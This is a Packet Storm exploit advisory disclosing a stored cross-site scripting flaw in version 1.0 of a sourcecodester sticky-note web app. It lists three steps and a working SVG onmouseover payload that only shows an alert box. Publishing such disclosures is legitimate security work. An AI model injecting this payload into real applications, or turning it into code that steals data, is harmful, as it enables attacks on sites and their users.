Sticky Notes Apps using JavaScript version 1.0 suffers from a persistent cross site scripting vulnerability.
234515a691f0b64cd76f2e7cc768f21f6b4a2acd12de1fdfb8d053770977997a# Exploit Title: Sticky Note Apps using JavaScript | Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-09
# Vendor Homepage:
https://www.sourcecodester.com/javascript/14742/sticky-note-apps-using-javascript-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14742&title=Sticky+Note+Apps+using+JavaScript+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps to Exploit.
1. Open the application
2. Add a new note with the payload below.
3. Mouse hover over the new posted note
Payload:
<svg onmouseover="alert(`Stored XSS`)"/>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed